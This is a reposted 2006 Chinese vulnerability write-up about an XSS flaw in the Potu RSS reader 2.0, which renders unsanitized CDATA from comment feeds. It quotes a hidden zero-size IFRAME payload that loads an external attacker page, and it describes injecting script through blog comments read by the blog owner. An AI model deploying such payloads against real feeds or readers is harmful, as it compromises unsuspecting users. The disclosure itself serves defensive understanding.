数据读取中...
 您当前位置:惠州维修 -> 电脑专题-> 网络安全 文章搜索:  
potu周博通-资讯阅读器2.0(26060619)XSS漏洞
作者:转载 来源:惠州维修
日期: 2006-11-19
放大字体显示 缩小字体显示 打印文章 推荐给朋友
  
如果成功攻击,会出现一个匡。 

但是  这个东西却不行,原因并不是potu的事情,而是该blog本身的防范,把这句自动转换成了 

“ <IFRAME src="http://www.inbreak.net/kxlzx1.htm" frameBorder=0 width=0 height=0></IFRAME>”  

结果不能执行。 
也就是说如果换个地方,也许会。。。 

相关动画下载: 

http://www.inbreak.net/blog/uploads/20060722/potuxss.rar 

空虚浪子心[XGC]

potu周博通-资讯阅读器2.0(26060619)XSS漏洞

 

周博通是目前最流行的免费RSS阅读器之一,界面友好,分类清晰,操作简单.内置新浪网、新华网、天极网、计世网等数百个RSS新闻源,不用打开网页就可第一时间阅读自己喜欢的新闻。 

CDATA部件在XML里: 

If your text contains a lot of "<" or "&" characters - as program code often does - the XML element can be defined as a CDATA section. 
如果文本包含了很多的"<"字符和"&"字符——就象程序代码一样,那么最好把他们都放到CDATA部件中。 
everything inside the CDATA section is ignored by the parser.所有在CDATA部件之间的文本都会被解析器忽略。 

而potu却自作聪明,把代码转换成了html,然后再从他自带的浏览器中打开。 

C:\Program Files\zhoubotong\RssReader\Common\temphtmlb.htm 

看起来很方面,却忽略了一些安全因素。 
比如这个CDATA,转换的时候,并没有做任何处理。导致了xss漏洞。 

现在我在blog里回复了一条xss语句。(刚好师父的blog里面有这个语句大全,所以。。。) 

因为本来订阅文章那里是用户订阅的。 
http://promise.cnxhacker.com/blog/feed.asp 

文章那里的rss只能是师父可以编辑,我们能编辑只能是回复的rss。 
http://promise.cnxhacker.com/blog/feed.asp?q=comment 

刚好,这个回复的通常只有blog的主人会去浏览。  

文章页数:[1] 
帮助你我他: 1.我有问题请教 2.我要投稿>>>
更多相关资料搜索:
热点文章
最新文章
相关文章
版权申明:除部分特别声明不要转载,或者授权本站独家播发的文章外,大家可以自由转载本站的原创文章,但原作者和来自本站的链接必须保留(非本站原创的,按照原来自一节,自行链接)。文章版权归本站和作者共有。
转载要求:转载之图片、文件,链接请不要盗链到本站,且不准打上各自站点的水印,亦不能抹去本站水印。
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
发表评论  打印  刷新  推荐给朋友  返回顶部  关闭

网上大名: